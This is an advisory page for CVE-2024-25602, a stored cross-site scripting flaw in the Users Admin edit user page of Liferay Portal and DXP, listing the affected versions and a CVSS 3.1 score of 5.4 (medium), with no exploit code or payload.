Stored XSS Vulnerability in Liferay Portal's Edit User Page
CVE-2024-25602

5.4MEDIUM

Key Information:

Vendor

Liferay

Status
Vendor
CVE Published:
21 February 2024

What is CVE-2024-25602?

A stored cross-site scripting vulnerability exists in the Users Admin module's edit user page of Liferay Portal and Liferay DXP. This vulnerability impacts versions ranging from Liferay Portal 7.2.0 through 7.4.2, as well as older unsupported versions, and affects Liferay DXP 7.3 before service pack 3 and Liferay DXP 7.2 before fix pack 17. Remote authenticated users can exploit this vulnerability to inject arbitrary web scripts or HTML through a crafted payload entered into the organization’s 'Name' text field, potentially allowing for unauthorized actions and data exposure.

Affected Version(s)

DXP 7.3.10 <= 7.3.10-dxp-2

DXP 7.2.10 <= 7.2.10-dxp-16

Portal 7.2.0 <= 7.4.2

References

CVSS V3.1

Score:
5.4
Severity:
MEDIUM
Confidentiality:
Low
Integrity:
Low
Availability:
Low
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.